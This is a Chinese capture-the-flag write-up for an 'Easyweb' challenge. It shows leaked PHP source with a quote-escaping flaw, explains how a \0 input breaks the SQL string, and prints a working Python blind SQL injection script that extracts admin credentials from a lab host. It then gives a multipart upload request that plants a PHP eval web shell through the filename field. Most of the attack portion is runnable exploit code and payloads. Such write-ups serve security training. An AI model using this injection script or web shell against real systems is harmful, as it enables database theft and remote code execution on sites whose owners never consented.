[总决赛]Easyweb
备份文件泄露,image.php.bak:
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
明显的SQL注入,过滤是先将字符串中的
'
、"
、\
添加上反斜杠,再将所有的\0
、%00
、\
、'
四个符号替换为空。
这里就存在一个多层过滤反而造成漏洞的问题,传入\0后会添加\为\\0,经过替换为空剩下\,注释掉字符串拼接后的字符,语句变成了这样。
select * from images where id='\' or path='{$path}'
盲注:
import requests
if __name__ == "__main__":
result = ""
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
# url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select username from users),{i},1))>{mid},1,0)%23"
url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select password from users),{i},1))>{mid},1,0)%23"
response = requests.get(url)
if response.text.find("JFIF") != -1:
left = mid + 1
else:
right = mid
mid = (left + right) // 2
result += chr(mid)
print(result, end="\n")
username: admin
password: 34b554ef83fbe7e7e859
进来之后是文件上传,这就比较简单了,由于过滤了php,我们用短标签文件名绕过即可。
------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="file"; filename="<?= @eval($_POST['shell']);?>"
Content-Type: application/octet-stream
111
------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundary7kJGMqV6oJpewWgp--
Last modified 8mo ago